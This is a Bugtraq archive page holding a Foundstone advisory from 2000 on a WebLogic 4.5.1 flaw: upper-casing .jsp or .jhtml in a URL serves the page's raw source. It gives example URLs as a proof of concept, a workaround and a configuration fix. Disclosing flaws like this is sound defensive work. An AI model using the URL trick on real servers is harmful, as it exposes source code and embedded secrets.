Bugtraq mailing list archives
BEA WebLogic JSP showcode vulnerability
From: stuart.mcclure () FOUNDSTONE COM (stuart.mcclure () FOUNDSTONE COM)
Date: Mon, 12 Jun 2000 01:19:45 -0400
Foundstone, Inc. http://www.foundstone.com "Securing the Dot Com World" Security Advisory BEA's WebLogic ---------------------------------------------------------------------- FS Advisory ID: FS-061200-2-BEA Release Date: June 12, 2000 Product: WebLogic Vendor: BEA Systems (http://www.beasys.com) Vendor Advisory: None available at release time. Type: JSP/JHTML show code vulnerability Severity: Low to Medium (depending on JSP/JHTML coding practices) Author: Saumil Shah (saumil.shah () foundstone com) Stuart McClure (stuart.mcclure () foundstone com) Foundstone, Inc. (http://www.foundstone.com) Operating Systems: Windows NT Vulnerable versions: Up to and including WebLogic 4.5.1 Foundstone Advisory: http://www.foundstone.com ---------------------------------------------------------------------- Description A show code vulnerability exists with BEA's WebLogic 4.5.1 for NT allowing an attacker to view the source code of Java Server Pages (JSP) or JHTML files. Details The problem lies with the way WebLogic assigns handlers to specific file types. For example, files with the extensions .jsp and .jhtml are registered as Java Server Pages or Java Servlet files in the WebLogic configuration "weblogic. properties" which lies under the \weblogic directory. A sample out-of-the-box configuration file looks as follows: # ---irrelevant part trimmed out--- # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # WEBLOGIC JHTML PROPERTIES # ------------------------------------------------ # Sets up automatic page compilation for JHTML. Adjust init # args for directory locations and uncomment to use. weblogic.httpd.register.*.jhtml=\ weblogic.servlet.jhtmlc.PageCompileServlet weblogic.httpd.initArgs.*.jhtml=\ pageCheckSeconds=1,\ packagePrefix=examples.jhtml,\ compileCommand=c:/java/bin/javac.exe,\ workingDir=d:/weblogic/myserver/classfiles,\ verbose=true # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # WEBLOGIC JSP PROPERTIES # ------------------------------------------------ # Sets up automatic page compilation for JSP. Adjust init # args for directory locations and uncomment to use. weblogic.httpd.register.*.jsp=\ weblogic.servlet.JSPServlet weblogic.httpd.initArgs.*.jsp=\ pageCheckSeconds=1,\ compileCommand=c:/java/bin/javac.exe,\ workingDir=d:/weblogic/myserver/classfiles,\ verbose=true We can observe that the extensions .jsp and .jhtml are assigned to be handled by the Java compiler. WebLogic being case sensitive by default, interprets .jsp and .JSP to be two extensions. Same is the case with .jhtml and .JHTML. If a request for a .JSP file is made to WebLogic, it cannot find a handler for the .JSP extension and therefore, it uses the default handler, which is of type "text". Since the underlying file system is Windows NT, it does not differentiate between upper case and lower case filenames, and hence the requested file ends up being served up as plain text without being parsed or interpreted. On WebLogic running on Unix servers, it flags a "File not Found" error. Proof of concept Normally, JSP and JHTML file are referred to in URLs using lower case extensions. For example: http://site.running.weblogic/login.jsp -or- http://site.running.weblogic/index.jhtml By changing any letters in the extension (.jsp or .jhtml) to upper case, it is possible to obtain the unparsed source code of the JSP or JHTML file: http://site.running.weblogic/login.JSP -or- http://site.running.weblogic/index.JHTML Solution Workaround A cumbersome workaround to this problem would be to add handlers for the following file extensions in the configuration file: For .jsp files: .jsp .Jsp .jSp .jsP .JSp .jSP .JsP .JSP For .jhtml files: .jhtml .Jhtml .jHtml .jhTml .jhtMl .jhtmL .JHtml .JhTml .JhtMl .JhtmL .jHTml .jHtMl .jHtmL .jhTMl .jhTmL .jhtML .JHTml .JHtMl .JHtmL .JhTMl .JhTmL .JhtML .jHTMl .jHTmL .jHtML .jhTML .JHTMl .JHTmL .JhTML .jHTML .JHTML These extension cover all combinations of upper and lower case characters for .jsp and .jhtml. Fix Check the following property in the weblogic.properties file: weblogic.httpd.servlet.extensionCaseSensitive In certain versions of BEA WebLogic Server, the default setting of this property is set to "false". For maximum security, as documented in the BEA security lockdown documentation at: http://www.weblogic.com/docs51/admindocs/properties.html http://www.weblogic.com/docs51/admindocs/lockdown.html set weblogic.httpd.servlet.extensionCaseSensitive to "true", or add the following line to your Weblogic.properties file: weblogic.httpd.servlet.extensionCaseSensitive=true See the follow matrix to determine the appropriate course of action for your version of BEA WebLogic Server. Version: BEA WebLogic 5.1 for Windows NT Status: Set to true by default Action: None Version: BEA WebLogic 4.5.2 for Windows NT Status: Set to true by default Action: None Version: BEA WebLogic 4.5.1 for Windows NT Status: Set to false by default Action: Set weblogic.httpd.servlet.extensionCaseSensitive=true Version: BEA WebLogic 4.0.4 for Windows NT Status: Set to false by default Action: Set weblogic.httpd.servlet.extensionCaseSensitive=true Version: BEA WebLogic 3.1.8 Status: False by default Action: Apply patch found at: ftp://ftpna.beasys.com/pub/releases/318/caseSensitiveNTFix318.zip Credits We would like to thank Shreeraj Shah for drawing our attention to this vulnerability. In addition, we would like to thank BEA for their prompt and serious attention to the problem. Disclaimer The information contained in this advisory is the copyright (C) 2000 of Foundstone, Inc. and believed to be accurate at the time of printing, but no representation or warranty is given, express or implied, as to its accuracy or completeness. Neither the author nor the publisher accepts any liability whatsoever for any direct, indirect or conquential loss or damage arising in any way from any use of, or reliance placed on, this information for any purpose. This advisory may be redistributed provided that no fee is assigned and that the advisory is not modified in any way.
Current thread:
- BRU Vulnerability root (Jun 06)
- Re: BRU Vulnerability Gavrie Philipson (Jun 07)
- Re: BRU Vulnerability Jeremy Rauch (Jun 08)
- Re: BRU Vulnerability Theo Van Dinter (Jun 11)
- Re: BRU Vulnerability terry white (Jun 11)
- Exploit to the overflow in restore Ronald Huizer [Crew] (Jun 14)
- Remote DoS attack in Networks Associates PGP Certificate Server Version 2.5 Vulnerability Ussr Labs (Jun 14)
- BEA WebLogic JSP showcode vulnerability stuart.mcclure () FOUNDSTONE COM (Jun 11)
- Re: BRU Vulnerability Jeremy Rauch (Jun 08)
- Microsoft Security Bulletin (MS00-040) Microsoft Product Security (Jun 08)
- Mission statement for LKAP(Linux Kernel Auditing Project) Bryan Paxton (Jun 08)
- Re: BRU Vulnerability Gavrie Philipson (Jun 07)